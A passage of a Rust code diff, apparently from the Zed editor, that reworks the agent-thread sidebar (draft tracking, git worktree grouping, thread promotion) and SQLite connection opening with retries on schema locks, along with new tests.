+ active_thread_is_draft: false,
+ hovered_thread_index: None,
collapsed_groups: HashSet::new(),
expanded_groups: HashMap::new(),
+ view: SidebarView::default(),
recent_projects_popover_handle: PopoverMenuHandle::default(),
+ project_header_menu_ix: None,
+ _subscriptions: Vec::new(),
+ _draft_observation: None,
}
}
+ fn is_active_workspace(&self, workspace: &Entity<Workspace>, cx: &App) -> bool {
+ self.multi_workspace
+ .upgrade()
+ .map_or(false, |mw| mw.read(cx).workspace() == workspace)
+ }
+
fn subscribe_to_workspace(
- &self,
+ &mut self,
workspace: &Entity<Workspace>,
window: &mut Window,
cx: &mut Context<Self>,
@@ -307,6 +378,26 @@ impl Sidebar {
)
.detach();
+ let git_store = workspace.read(cx).project().read(cx).git_store().clone();
+ cx.subscribe_in(
+ &git_store,
+ window,
+ |this, _, event: &project::git_store::GitStoreEvent, window, cx| {
+ if matches!(
+ event,
+ project::git_store::GitStoreEvent::RepositoryUpdated(
+ _,
+ project::git_store::RepositoryEvent::GitWorktreeListChanged,
+ _,
+ )
+ ) {
+ this.prune_stale_worktree_workspaces(window, cx);
+ this.update_entries(cx);
+ }
+ },
+ )
+ .detach();
+
cx.subscribe_in(
workspace,
window,
@@ -320,13 +411,19 @@ impl Sidebar {
)
.detach();
+ self.observe_docks(workspace, cx);
+
if let Some(agent_panel) = workspace.read(cx).panel::<AgentPanel>(cx) {
self.subscribe_to_agent_panel(&agent_panel, window, cx);
+ if self.is_active_workspace(workspace, cx) {
+ self.agent_panel_visible = AgentPanel::is_visible(workspace, cx);
+ }
+ self.observe_draft_editor(cx);
}
}
fn subscribe_to_agent_panel(
- &self,
+ &mut self,
agent_panel: &Entity<AgentPanel>,
window: &mut Window,
cx: &mut Context<Self>,
@@ -336,29 +433,17 @@ impl Sidebar {
window,
|this, agent_panel, event: &AgentPanelEvent, _window, cx| match event {
AgentPanelEvent::ActiveViewChanged => {
- match agent_panel.read(cx).active_connection_view() {
- Some(thread) => {
- if let Some(session_id) = thread.read(cx).parent_id(cx) {
- this.focused_thread = Some(session_id);
- }
- }
- None => {
- this.focused_thread = None;
- }
- }
- this.update_entries(cx);
- }
- AgentPanelEvent::ThreadFocused => {
- let new_focused = agent_panel
+ let is_new_draft = agent_panel
.read(cx)
- .active_connection_view()
- .and_then(|thread| thread.read(cx).parent_id(cx));
- if new_focused.is_some() && new_focused != this.focused_thread {
- this.focused_thread = new_focused;
- this.update_entries(cx);
+ .active_conversation_view()
+ .is_some_and(|cv| cv.read(cx).parent_id(cx).is_none());
+ if is_new_draft {
+ this.focused_thread = None;
}
+ this.observe_draft_editor(cx);
+ this.update_entries(cx);
}
- AgentPanelEvent::BackgroundThreadChanged => {
+ AgentPanelEvent::ThreadFocused | AgentPanelEvent::BackgroundThreadChanged => {
this.update_entries(cx);
}
},
@@ -366,6 +451,99 @@ impl Sidebar {
.detach();
}
+ fn observe_docks(&mut self, workspace: &Entity<Workspace>, cx: &mut Context<Self>) {
+ let docks: Vec<_> = workspace
+ .read(cx)
+ .all_docks()
+ .into_iter()
+ .cloned()
+ .collect();
+ let workspace = workspace.downgrade();
+ for dock in docks {
+ let workspace = workspace.clone();
+ cx.observe(&dock, move |this, _dock, cx| {
+ let Some(workspace) = workspace.upgrade() else {
+ return;
+ };
+ if !this.is_active_workspace(&workspace, cx) {
+ return;
+ }
+
+ let is_visible = AgentPanel::is_visible(&workspace, cx);
+
+ if this.agent_panel_visible != is_visible {
+ this.agent_panel_visible = is_visible;
+ cx.notify();
+ }
+ })
+ .detach();
+ }
+ }
+
+ fn observe_draft_editor(&mut self, cx: &mut Context<Self>) {
+ self._draft_observation = self
+ .multi_workspace
+ .upgrade()
+ .and_then(|mw| {
+ let ws = mw.read(cx).workspace();
+ ws.read(cx).panel::<AgentPanel>(cx)
+ })
+ .and_then(|panel| {
+ let cv = panel.read(cx).active_conversation_view()?;
+ let tv = cv.read(cx).active_thread()?;
+ Some(tv.read(cx).message_editor.clone())
+ })
+ .map(|editor| {
+ cx.observe(&editor, |_this, _editor, cx| {
+ cx.notify();
+ })
+ });
+ }
+
+ fn active_draft_text(&self, cx: &App) -> Option<SharedString> {
+ let mw = self.multi_workspace.upgrade()?;
+ let workspace = mw.read(cx).workspace();
+ let panel = workspace.read(cx).panel::<AgentPanel>(cx)?;
+ let conversation_view = panel.read(cx).active_conversation_view()?;
+ let thread_view = conversation_view.read(cx).active_thread()?;
+ let raw = thread_view.read(cx).message_editor.read(cx).text(cx);
+ let cleaned = Self::clean_mention_links(&raw);
+ let mut text: String = cleaned.split_whitespace().collect::<Vec<_>>().join(" ");
+ if text.is_empty() {
+ None
+ } else {
+ const MAX_CHARS: usize = 250;
+ if let Some((truncate_at, _)) = text.char_indices().nth(MAX_CHARS) {
+ text.truncate(truncate_at);
+ }
+ Some(text.into())
+ }
+ }
+
+ fn clean_mention_links(input: &str) -> String {
+ let mut result = String::with_capacity(input.len());
+ let mut remaining = input;
+
+ while let Some(start) = remaining.find("[@") {
+ result.push_str(&remaining[..start]);
+ let after_bracket = &remaining[start + 1..]; // skip '['
+ if let Some(close_bracket) = after_bracket.find("](") {
+ let mention = &after_bracket[..close_bracket]; // "@something"
+ let after_link_start = &after_bracket[close_bracket + 2..]; // after "]("
+ if let Some(close_paren) = after_link_start.find(')') {
+ result.push_str(mention);
+ remaining = &after_link_start[close_paren + 1..];
+ continue;
+ }
+ }
+ // Couldn't parse full link syntax — emit the literal "[@" and move on.
+ result.push_str("[@");
+ remaining = &remaining[start + 2..];
+ }
+ result.push_str(remaining);
+ result
+ }
+
fn all_thread_infos_for_workspace(
workspace: &Entity<Workspace>,
cx: &App,
@@ -384,7 +562,11 @@ impl Sidebar {
let icon = thread_view_ref.agent_icon;
let icon_from_external_svg = thread_view_ref.agent_icon_from_external_svg.clone();
- let title = thread.title();
+ let title = thread
+ .title()
+ .unwrap_or_else(|| DEFAULT_THREAD_TITLE.into());
+ let is_native = thread_view_ref.as_native_thread(cx).is_some();
+ let is_title_generating = is_native && thread.has_provisional_title();
let session_id = thread.session_id().clone();
let is_background = agent_panel_ref.is_background_thread(&session_id);
@@ -399,6 +581,8 @@ impl Sidebar {
}
};
+ let diff_stats = thread.action_log().read(cx).diff_stats(cx);
+
ActiveThreadInfo {
session_id,
title,
@@ -406,11 +590,15 @@ impl Sidebar {
icon,
icon_from_external_svg,
is_background,
+ is_title_generating,
+ diff_stats,
}
})
.collect()
}
+    /// When modifying this function, aim for a single forward pass over workspaces
+ /// and threads plus an O(T log T) sort. Avoid adding extra scans over the data.
fn rebuild_contents(&mut self, cx: &App) {
let Some(multi_workspace) = self.multi_workspace.upgrade() else {
return;
@@ -419,9 +607,43 @@ impl Sidebar {
let workspaces = mw.workspaces().to_vec();
let active_workspace = mw.workspaces().get(mw.active_workspace_index()).cloned();
- let thread_store = ThreadStore::try_global(cx);
+ // Build a lookup for agent icons from the first workspace's AgentServerStore.
+ let agent_server_store = workspaces
+ .first()
+ .map(|ws| ws.read(cx).project().read(cx).agent_server_store().clone());
+
let query = self.filter_editor.read(cx).text(cx);
+ // Re-derive agent_panel_visible from the active workspace so it stays
+ // correct after workspace switches.
+ self.agent_panel_visible = active_workspace
+ .as_ref()
+ .map_or(false, |ws| AgentPanel::is_visible(ws, cx));
+
+ // Derive active_thread_is_draft BEFORE focused_thread so we can
+ // use it as a guard below.
+ self.active_thread_is_draft = active_workspace
+ .as_ref()
+ .and_then(|ws| ws.read(cx).panel::<AgentPanel>(cx))
+ .map_or(false, |panel| panel.read(cx).active_thread_is_draft(cx));
+
+ // Derive focused_thread from the active workspace's agent panel.
+ // Only update when the panel gives us a positive signal — if the
+ // panel returns None (e.g. still loading after a thread activation),
+ // keep the previous value so eager writes from user actions survive.
+ let panel_focused = active_workspace
+ .as_ref()
+ .and_then(|ws| ws.read(cx).panel::<AgentPanel>(cx))
+ .and_then(|panel| {
+ panel
+ .read(cx)
+ .active_conversation_view()
+ .and_then(|cv| cv.read(cx).parent_id(cx))
+ });
+ if panel_focused.is_some() && !self.active_thread_is_draft {
+ self.focused_thread = panel_focused;
+ }
+
let previous = mem::take(&mut self.contents);
let old_statuses: HashMap<acp::SessionId, AgentThreadStatus> = previous
@@ -437,87 +659,294 @@ impl Sidebar {
let mut entries = Vec::new();
let mut notified_threads = previous.notified_threads;
- // Track all session IDs we add to entries so we can prune stale
- // notifications without a separate pass at the end.
let mut current_session_ids: HashSet<acp::SessionId> = HashSet::new();
- // Compute active_entry_index inline during the build pass.
- let mut active_entry_index: Option<usize> = None;
+ let mut project_header_indices: Vec<usize> = Vec::new();
+
+ // Identify absorbed workspaces in a single pass. A workspace is
+ // "absorbed" when it points at a git worktree checkout whose main
+ // repo is open as another workspace — its threads appear under the
+ // main repo's header instead of getting their own.
+ let mut main_repo_workspace: HashMap<Arc<Path>, usize> = HashMap::new();
+ let mut absorbed: HashMap<usize, (usize, SharedString)> = HashMap::new();
+ let mut pending: HashMap<Arc<Path>, Vec<(usize, SharedString, Arc<Path>)>> = HashMap::new();
+ let mut absorbed_workspace_by_path: HashMap<Arc<Path>, usize> = HashMap::new();
+
+ for (i, workspace) in workspaces.iter().enumerate() {
+ for snapshot in root_repository_snapshots(workspace, cx) {
+ if snapshot.work_directory_abs_path == snapshot.original_repo_abs_path {
+ main_repo_workspace
+ .entry(snapshot.work_directory_abs_path.clone())
+ .or_insert(i);
+ if let Some(waiting) = pending.remove(&snapshot.work_directory_abs_path) {
+ for (ws_idx, name, ws_path) in waiting {
+ absorbed.insert(ws_idx, (i, name));
+ absorbed_workspace_by_path.insert(ws_path, ws_idx);
+ }
+ }
+ } else {
+ let name: SharedString = snapshot
+ .work_directory_abs_path
+ .file_name()
+ .unwrap_or_default()
+ .to_string_lossy()
+ .to_string()
+ .into();
+ if let Some(&main_idx) =
+ main_repo_workspace.get(&snapshot.original_repo_abs_path)
+ {
+ absorbed.insert(i, (main_idx, name));
+ absorbed_workspace_by_path
+ .insert(snapshot.work_directory_abs_path.clone(), i);
+ } else {
+ pending
+ .entry(snapshot.original_repo_abs_path.clone())
+ .or_default()
+ .push((i, name, snapshot.work_directory_abs_path.clone()));
+ }
+ }
+ }
+ }
+
+ let has_open_projects = workspaces
+ .iter()
+ .any(|ws| !workspace_path_list(ws, cx).paths().is_empty());
+
+ let active_ws_index = active_workspace
+ .as_ref()
+ .and_then(|active| workspaces.iter().position(|ws| ws == active));
- for workspace in workspaces.iter() {
- let (path_list, label) = workspace_path_list_and_label(workspace, cx);
+ for (ws_index, workspace) in workspaces.iter().enumerate() {
+ if absorbed.contains_key(&ws_index) {
+ continue;
+ }
+
+ let path_list = workspace_path_list(workspace, cx);
+ if path_list.paths().is_empty() {
+ continue;
+ }
+
+ let label = workspace_label_from_path_list(&path_list);
let is_collapsed = self.collapsed_groups.contains(&path_list);
let should_load_threads = !is_collapsed || !query.is_empty();
+ let is_active = active_ws_index.is_some_and(|active_idx| {
+ active_idx == ws_index
+ || absorbed
+ .get(&active_idx)
+ .is_some_and(|(main_idx, _)| *main_idx == ws_index)
+ });
+
+ let mut live_infos = Self::all_thread_infos_for_workspace(workspace, cx);
+
let mut threads: Vec<ThreadEntry> = Vec::new();
+ let mut has_running_threads = false;
+ let mut waiting_thread_count: usize = 0;
if should_load_threads {
- if let Some(ref thread_store) = thread_store {
- for meta in thread_store.read(cx).threads_for_paths(&path_list) {
- threads.push(ThreadEntry {
- session_info: meta.into(),
- icon: IconName::ZedAgent,
- icon_from_external_svg: None,
- status: AgentThreadStatus::default(),
- workspace: workspace.clone(),
- is_live: false,
- is_background: false,
- highlight_positions: Vec::new(),
- });
- }
+ let mut seen_session_ids: HashSet<acp::SessionId> = HashSet::new();
+
+ // Read threads from the store cache for this workspace's path list.
+ let thread_store = SidebarThreadMetadataStore::global(cx);
+ let workspace_rows: Vec<_> =
+ thread_store.read(cx).entries_for_path(&path_list).collect();
+ for row in workspace_rows {
+ seen_session_ids.insert(row.session_id.clone());
+ let (agent, icon, icon_from_external_svg) = match &row.agent_id {
+ None => (Agent::NativeAgent, IconName::ZedAgent, None),
+ Some(id) => {
+ let custom_icon = agent_server_store
+ .as_ref()
+ .and_then(|store| store.read(cx).agent_icon(&id));
+ (
+ Agent::Custom { id: id.clone() },
+ IconName::Terminal,
+ custom_icon,
+ )
+ }
+ };
+ threads.push(ThreadEntry {
+ agent,
+ session_info: acp_thread::AgentSessionInfo {
+ session_id: row.session_id.clone(),
+ work_dirs: None,
+ title: Some(row.title.clone()),
+ updated_at: Some(row.updated_at),
+ created_at: row.created_at,
+ meta: None,
+ },
+ icon,
+ icon_from_external_svg,
+ status: AgentThreadStatus::default(),
+ workspace: ThreadEntryWorkspace::Open(workspace.clone()),
+ is_live: false,
+ is_background: false,
+ is_title_generating: false,
+ highlight_positions: Vec::new(),
+ worktree_name: None,
+ worktree_full_path: None,
+ worktree_highlight_positions: Vec::new(),
+ diff_stats: DiffStats::default(),
+ });
}
- let live_infos = Self::all_thread_infos_for_workspace(workspace, cx);
+ // Load threads from linked git worktrees of this workspace's repos.
+ {
+ let mut linked_worktree_queries: Vec<(PathList, SharedString, Arc<Path>)> =
+ Vec::new();
+ for snapshot in root_repository_snapshots(workspace, cx) {
+ if snapshot.work_directory_abs_path != snapshot.original_repo_abs_path {
+ continue;
+ }
+
+ let main_worktree_path = snapshot.original_repo_abs_path.clone();
+
+ for git_worktree in snapshot.linked_worktrees() {
+ let worktree_name =
+ linked_worktree_short_name(&main_worktree_path, &git_worktree.path)
+ .unwrap_or_default();
+ linked_worktree_queries.push((
+ PathList::new(std::slice::from_ref(&git_worktree.path)),
+ worktree_name,
+ Arc::from(git_worktree.path.as_path()),
+ ));
+ }
+ }
- if !live_infos.is_empty() {
- let thread_index_by_session: HashMap<acp::SessionId, usize> = threads
- .iter()
- .enumerate()
- .map(|(i, t)| (t.session_info.session_id.clone(), i))
- .collect();
+ for (worktree_path_list, worktree_name, worktree_path) in
+ &linked_worktree_queries
+ {
+ let target_workspace =
+ match absorbed_workspace_by_path.get(worktree_path.as_ref()) {
+ Some(&idx) => {
+ live_infos.extend(Self::all_thread_infos_for_workspace(
+ &workspaces[idx],
+ cx,
+ ));
+ ThreadEntryWorkspace::Open(workspaces[idx].clone())
+ }
+ None => ThreadEntryWorkspace::Closed(worktree_path_list.clone()),
+ };
- for info in &live_infos {
- let Some(&idx) = thread_index_by_session.get(&info.session_id) else {
- continue;
- };
+ let worktree_rows: Vec<_> = thread_store
+ .read(cx)
+ .entries_for_path(worktree_path_list)
+ .collect();
+ for row in worktree_rows {
+ if !seen_session_ids.insert(row.session_id.clone()) {
+ continue;
+ }
+ let (agent, icon, icon_from_external_svg) = match &row.agent_id {
+ None => (Agent::NativeAgent, IconName::ZedAgent, None),
+ Some(name) => {
+ let custom_icon =
+ agent_server_store.as_ref().and_then(|store| {
+ store.read(cx).agent_icon(&AgentId(name.clone().into()))
+ });
+ (
+ Agent::Custom {
+ id: AgentId::new(name.clone()),
+ },
+ IconName::Terminal,
+ custom_icon,
+ )
+ }
+ };
+ threads.push(ThreadEntry {
+ agent,
+ session_info: acp_thread::AgentSessionInfo {
+ session_id: row.session_id.clone(),
+ work_dirs: None,
+ title: Some(row.title.clone()),
+ updated_at: Some(row.updated_at),
+ created_at: row.created_at,
+ meta: None,
+ },
+ icon,
+ icon_from_external_svg,
+ status: AgentThreadStatus::default(),
+ workspace: target_workspace.clone(),
+ is_live: false,
+ is_background: false,
+ is_title_generating: false,
+ highlight_positions: Vec::new(),
+ worktree_name: Some(worktree_name.clone()),
+ worktree_full_path: Some(
+ worktree_path.display().to_string().into(),
+ ),
+ worktree_highlight_positions: Vec::new(),
+ diff_stats: DiffStats::default(),
+ });
+ }
+ }
+ }
+
+ // Build a lookup from live_infos and compute running/waiting
+ // counts in a single pass.
+ let mut live_info_by_session: HashMap<&acp::SessionId, &ActiveThreadInfo> =
+ HashMap::new();
+ for info in &live_infos {
+ live_info_by_session.insert(&info.session_id, info);
+ if info.status == AgentThreadStatus::Running {
+ has_running_threads = true;
+ }
+ if info.status == AgentThreadStatus::WaitingForConfirmation {
+ waiting_thread_count += 1;
+ }
+ }
- let thread = &mut threads[idx];
+ // Merge live info into threads and update notification state
+ // in a single pass.
+ for thread in &mut threads {
+ let session_id = &thread.session_info.session_id;
+
+ if let Some(info) = live_info_by_session.get(session_id) {
thread.session_info.title = Some(info.title.clone());
thread.status = info.status;
thread.icon = info.icon;
thread.icon_from_external_svg = info.icon_from_external_svg.clone();
thread.is_live = true;
thread.is_background = info.is_background;
+ thread.is_title_generating = info.is_title_generating;
+ thread.diff_stats = info.diff_stats;
}
- }
- // Update notification state for live threads in the same pass.
- let is_active_workspace = active_workspace
- .as_ref()
- .is_some_and(|active| active == workspace);
+ let is_thread_workspace_active = match &thread.workspace {
+ ThreadEntryWorkspace::Open(thread_workspace) => active_workspace
+ .as_ref()
+ .is_some_and(|active| active == thread_workspace),
+ ThreadEntryWorkspace::Closed(_) => false,
+ };
- for thread in &threads {
- let session_id = &thread.session_info.session_id;
- if thread.is_background && thread.status == AgentThreadStatus::Completed {
- notified_threads.insert(session_id.clone());
- } else if thread.status == AgentThreadStatus::Completed
- && !is_active_workspace
+ if thread.status == AgentThreadStatus::Completed
+ && !is_thread_workspace_active
&& old_statuses.get(session_id) == Some(&AgentThreadStatus::Running)
{
notified_threads.insert(session_id.clone());
}
- if is_active_workspace && !thread.is_background {
+ if is_thread_workspace_active && !thread.is_background {
notified_threads.remove(session_id);
}
}
- threads.sort_by(|a, b| b.session_info.updated_at.cmp(&a.session_info.updated_at));
+ threads.sort_by(|a, b| {
+ let a_time = a.session_info.created_at.or(a.session_info.updated_at);
+ let b_time = b.session_info.created_at.or(b.session_info.updated_at);
+ b_time.cmp(&a_time)
+ });
+ } else {
+ for info in &live_infos {
+ if info.status == AgentThreadStatus::Running {
+ has_running_threads = true;
+ }
+ if info.status == AgentThreadStatus::WaitingForConfirmation {
+ waiting_thread_count += 1;
+ }
+ }
}
if !query.is_empty() {
- let has_threads = !threads.is_empty();
-
let workspace_highlight_positions =
fuzzy_match_positions(&query, &label).unwrap_or_default();
let workspace_matched = !workspace_highlight_positions.is_empty();
@@ -533,7 +962,16 @@ impl Sidebar {
if let Some(positions) = fuzzy_match_positions(&query, title) {
thread.highlight_positions = positions;
}
- if workspace_matched || !thread.highlight_positions.is_empty() {
+ if let Some(worktree_name) = &thread.worktree_name {
+ if let Some(positions) = fuzzy_match_positions(&query, worktree_name) {
+ thread.worktree_highlight_positions = positions;
+ }
+ }
+ let worktree_matched = !thread.worktree_highlight_positions.is_empty();
+ if workspace_matched
+ || !thread.highlight_positions.is_empty()
+ || worktree_matched
+ {
matched_threads.push(thread);
}
}
@@ -542,97 +980,99 @@ impl Sidebar {
continue;
}
- if active_entry_index.is_none()
- && self.focused_thread.is_none()
- && active_workspace
- .as_ref()
- .is_some_and(|active| active == workspace)
- {
- active_entry_index = Some(entries.len());
- }
-
+ project_header_indices.push(entries.len());
entries.push(ListEntry::ProjectHeader {
path_list: path_list.clone(),
label,
workspace: workspace.clone(),
highlight_positions: workspace_highlight_positions,
- has_threads,
+ has_running_threads,
+ waiting_thread_count,
+ is_active,
});
- // Track session IDs and compute active_entry_index as we add
- // thread entries.
for thread in matched_threads {
current_session_ids.insert(thread.session_info.session_id.clone());
- if active_entry_index.is_none() {
- if let Some(focused) = &self.focused_thread {
- if &thread.session_info.session_id == focused {
- active_entry_index = Some(entries.len());
- }
- }
- }
entries.push(thread.into());
}
} else {
- let has_threads = !threads.is_empty();
-
- // Check if this header is the active entry before pushing it.
- if active_entry_index.is_none()
+ let thread_count = threads.len();
+ let is_draft_for_workspace = self.agent_panel_visible
+ && self.active_thread_is_draft
&& self.focused_thread.is_none()
- && active_workspace
- .as_ref()
- .is_some_and(|active| active == workspace)
- {
- active_entry_index = Some(entries.len());
- }
+ && is_active;
+
+ let show_new_thread_entry = thread_count == 0 || is_draft_for_workspace;
+ project_header_indices.push(entries.len());
entries.push(ListEntry::ProjectHeader {
path_list: path_list.clone(),
label,
workspace: workspace.clone(),
highlight_positions: Vec::new(),
- has_threads,
+ has_running_threads,
+ waiting_thread_count,
+ is_active,
});
if is_collapsed {
continue;
}
+ if show_new_thread_entry {
+ entries.push(ListEntry::NewThread {
+ path_list: path_list.clone(),
+ workspace: workspace.clone(),
+ is_active_draft: is_draft_for_workspace,
+ });
+ }
+
let total = threads.len();
let extra_batches = self.expanded_groups.get(&path_list).copied().unwrap_or(0);
let threads_to_show =
DEFAULT_THREADS_SHOWN + (extra_batches * DEFAULT_THREADS_SHOWN);
let count = threads_to_show.min(total);
- let is_fully_expanded = count >= total;
- // Track session IDs and compute active_entry_index as we add
- // thread entries.
- for thread in threads.into_iter().take(count) {
- current_session_ids.insert(thread.session_info.session_id.clone());
- if active_entry_index.is_none() {
- if let Some(focused) = &self.focused_thread {
- if &thread.session_info.session_id == focused {
- active_entry_index = Some(entries.len());
- }
+ let mut promoted_threads: HashSet<acp::SessionId> = HashSet::new();
+
+                            // Build visible entries in a single pass. Threads within
+                            // the cutoff are always shown. Threads beyond it are shown
+                            // only if they should be promoted (running, waiting,
+                            // notified, or focused).
+ for (index, thread) in threads.into_iter().enumerate() {
+ let is_hidden = index >= count;
+
+ let session_id = &thread.session_info.session_id;
+ if is_hidden {
+ let is_promoted = thread.status == AgentThreadStatus::Running
+ || thread.status == AgentThreadStatus::WaitingForConfirmation
+ || notified_threads.contains(session_id)
+ || self
+ .focused_thread
+ .as_ref()
+ .is_some_and(|id| id == session_id);
+ if is_promoted {
+ promoted_threads.insert(session_id.clone());
+ }
+ if !promoted_threads.contains(session_id) {
+ continue;
}
}
+
+ current_session_ids.insert(session_id.clone());
entries.push(thread.into());
}
+ let visible = count + promoted_threads.len();
+ let is_fully_expanded = visible >= total;
+
if total > DEFAULT_THREADS_SHOWN {
entries.push(ListEntry::ViewMore {
path_list: path_list.clone(),
- remaining_count: total.saturating_sub(count),
is_fully_expanded,
});
}
-
- if total == 0 {
- entries.push(ListEntry::NewThread {
- path_list: path_list.clone(),
- workspace: workspace.clone(),
- });
- }
}
}
@@ -18,7 +18,7 @@ pub struct Connection {
unsafe impl Send for Connection {}
impl Connection {
- pub(crate) fn open(uri: &str, persistent: bool) -> Result<Self> {
+ fn open_with_flags(uri: &str, persistent: bool, flags: i32) -> Result<Self> {
let mut connection = Self {
sqlite3: ptr::null_mut(),
persistent,
@@ -26,7 +26,6 @@ impl Connection {
_sqlite: PhantomData,
};
- let flags = SQLITE_OPEN_CREATE | SQLITE_OPEN_NOMUTEX | SQLITE_OPEN_READWRITE;
unsafe {
sqlite3_open_v2(
CString::new(uri)?.as_ptr(),
@@ -44,6 +43,14 @@ impl Connection {
Ok(connection)
}
+ pub(crate) fn open(uri: &str, persistent: bool) -> Result<Self> {
+ Self::open_with_flags(
+ uri,
+ persistent,
+ SQLITE_OPEN_CREATE | SQLITE_OPEN_NOMUTEX | SQLITE_OPEN_READWRITE,
+ )
+ }
+
/// Attempts to open the database at uri. If it fails, a shared memory db will be opened
/// instead.
pub fn open_file(uri: &str) -> Self {
@@ -51,13 +58,17 @@ impl Connection {
}
pub fn open_memory(uri: Option<&str>) -> Self {
- let in_memory_path = if let Some(uri) = uri {
- format!("file:{}?mode=memory&cache=shared", uri)
+ if let Some(uri) = uri {
+ let in_memory_path = format!("file:{}?mode=memory&cache=shared", uri);
+ return Self::open_with_flags(
+ &in_memory_path,
+ false,
+ SQLITE_OPEN_CREATE | SQLITE_OPEN_NOMUTEX | SQLITE_OPEN_READWRITE | SQLITE_OPEN_URI,
+ )
+ .expect("Could not create fallback in memory db");
} else {
- ":memory:".to_string()
- };
-
- Self::open(&in_memory_path, false).expect("Could not create fallback in memory db")
+ Self::open(":memory:", false).expect("Could not create fallback in memory db")
+ }
}
pub fn persistent(&self) -> bool {
@@ -265,9 +276,50 @@ impl Drop for Connection {
mod test {
use anyhow::Result;
use indoc::indoc;
+ use std::{
+ fs,
+ sync::atomic::{AtomicUsize, Ordering},
+ };
use crate::connection::Connection;
+ static NEXT_NAMED_MEMORY_DB_ID: AtomicUsize = AtomicUsize::new(0);
+
+ fn unique_named_memory_db(prefix: &str) -> String {
+ format!(
+ "{prefix}_{}_{}",
+ std::process::id(),
+ NEXT_NAMED_MEMORY_DB_ID.fetch_add(1, Ordering::Relaxed)
+ )
+ }
+
+ fn literal_named_memory_paths(name: &str) -> [String; 3] {
+ let main = format!("file:{name}?mode=memory&cache=shared");
+ [main.clone(), format!("{main}-wal"), format!("{main}-shm")]
+ }
+
+ struct NamedMemoryPathGuard {
+ paths: [String; 3],
+ }
+
+ impl NamedMemoryPathGuard {
+ fn new(name: &str) -> Self {
+ let paths = literal_named_memory_paths(name);
+ for path in &paths {
+ let _ = fs::remove_file(path);
+ }
+ Self { paths }
+ }
+ }
+
+ impl Drop for NamedMemoryPathGuard {
+ fn drop(&mut self) {
+ for path in &self.paths {
+ let _ = fs::remove_file(path);
+ }
+ }
+ }
+
#[test]
fn string_round_trips() -> Result<()> {
let connection = Connection::open_memory(Some("string_round_trips"));
@@ -382,6 +434,41 @@ mod test {
assert_eq!(read_blobs, vec![blob]);
}
+ #[test]
+ fn named_memory_connections_do_not_create_literal_backing_files() {
+ let name = unique_named_memory_db("named_memory_connections_do_not_create_backing_files");
+ let guard = NamedMemoryPathGuard::new(&name);
+
+ let connection1 = Connection::open_memory(Some(&name));
+ connection1
+ .exec(indoc! {"
+ CREATE TABLE shared (
+ value INTEGER
+ )"})
+ .unwrap()()
+ .unwrap();
+ connection1
+ .exec("INSERT INTO shared (value) VALUES (7)")
+ .unwrap()()
+ .unwrap();
+
+ let connection2 = Connection::open_memory(Some(&name));
+ assert_eq!(
+ connection2
+ .select_row::<i64>("SELECT value FROM shared")
+ .unwrap()()
+ .unwrap(),
+ Some(7)
+ );
+
+ for path in &guard.paths {
+ assert!(
+ fs::metadata(path).is_err(),
+ "named in-memory database unexpectedly created backing file {path}"
+ );
+ }
+ }
+
#[test]
fn multi_step_statement_works() {
let connection = Connection::open_memory(Some("multi_step_statement_works"));
@@ -7,12 +7,15 @@ use std::{
ops::Deref,
sync::{Arc, LazyLock},
thread,
+ time::Duration,
};
use thread_local::ThreadLocal;
use crate::{connection::Connection, domain::Migrator, util::UnboundedSyncSender};
const MIGRATION_RETRIES: usize = 10;
+const CONNECTION_INITIALIZE_RETRIES: usize = 50;
+const CONNECTION_INITIALIZE_RETRY_DELAY: Duration = Duration::from_millis(1);
type QueuedWrite = Box<dyn 'static + Send + FnOnce()>;
type WriteQueue = Box<dyn 'static + Send + Sync + Fn(QueuedWrite)>;
@@ -197,21 +200,54 @@ impl ThreadSafeConnection {
Self::open_shared_memory(uri)
};
+ if let Some(initialize_query) = connection_initialize_query {
+ let mut last_error = None;
+ let initialized = (0..CONNECTION_INITIALIZE_RETRIES).any(|attempt| {
+ match connection
+ .exec(initialize_query)
+ .and_then(|mut statement| statement())
+ {
+ Ok(()) => true,
+ Err(err)
+ if is_schema_lock_error(&err)
+ && attempt + 1 < CONNECTION_INITIALIZE_RETRIES =>
+ {
+ last_error = Some(err);
+ thread::sleep(CONNECTION_INITIALIZE_RETRY_DELAY);
+ false
+ }
+ Err(err) => {
+ panic!(
+ "Initialize query failed to execute: {}\n\nCaused by:\n{err:#}",
+ initialize_query
+ )
+ }
+ }
+ });
+
+ if !initialized {
+ let err = last_error
+ .expect("connection initialization retries should record the last error");
+ panic!(
+ "Initialize query failed to execute after retries: {}\n\nCaused by:\n{err:#}",
+ initialize_query
+ );
+ }
+ }
+
// Disallow writes on the connection. The only writes allowed for thread safe connections
// are from the background thread that can serialize them.
*connection.write.get_mut() = false;
- if let Some(initialize_query) = connection_initialize_query {
- connection.exec(initialize_query).unwrap_or_else(|_| {
- panic!("Initialize query failed to execute: {}", initialize_query)
- })()
- .unwrap()
- }
-
connection
}
}
+fn is_schema_lock_error(err: &anyhow::Error) -> bool {
+ let message = format!("{err:#}");
+ message.contains("database schema is locked") || message.contains("database is locked")
+}
+
impl ThreadSafeConnection {
/// Special constructor for ThreadSafeConnection which disallows db initialization and migrations.
/// This allows construction to be infallible and not write to the db.
@@ -282,7 +318,7 @@ mod test {
use indoc::indoc;
use std::ops::Deref;
- use std::thread;
+ use std::{thread, time::Duration};
use crate::{domain::Domain, thread_safe_connection::ThreadSafeConnection};
@@ -318,38 +354,21 @@ mod test {
}
#[test]
- #[should_panic]
- fn wild_zed_lost_failure() {
- enum TestWorkspace {}
- impl Domain for TestWorkspace {
- const NAME: &str = "workspace";
-
- const MIGRATIONS: &[&str] = &["
- CREATE TABLE workspaces(
- workspace_id INTEGER PRIMARY KEY,
- dock_visible INTEGER, -- Boolean
- dock_anchor TEXT, -- Enum: 'Bottom' / 'Right' / 'Expanded'
- dock_pane INTEGER, -- NULL indicates that we don't have a dock pane yet
- timestamp TEXT DEFAULT CURRENT_TIMESTAMP NOT NULL,
- FOREIGN KEY(dock_pane) REFERENCES panes(pane_id),
- FOREIGN KEY(active_pane) REFERENCES panes(pane_id)
- ) STRICT;
-
- CREATE TABLE panes(
- pane_id INTEGER PRIMARY KEY,
- workspace_id INTEGER NOT NULL,
- active INTEGER NOT NULL, -- Boolean
- FOREIGN KEY(workspace_id) REFERENCES workspaces(workspace_id)
- ON DELETE CASCADE
- ON UPDATE CASCADE
- ) STRICT;
- "];
- }
-
- let builder =
- ThreadSafeConnection::builder::<TestWorkspace>("wild_zed_lost_failure", false)
- .with_connection_initialize_query("PRAGMA FOREIGN_KEYS=true");
-
- smol::block_on(builder.build()).unwrap();
+ fn connection_initialize_query_retries_transient_schema_lock() {
+ let name = "connection_initialize_query_retries_transient_schema_lock";
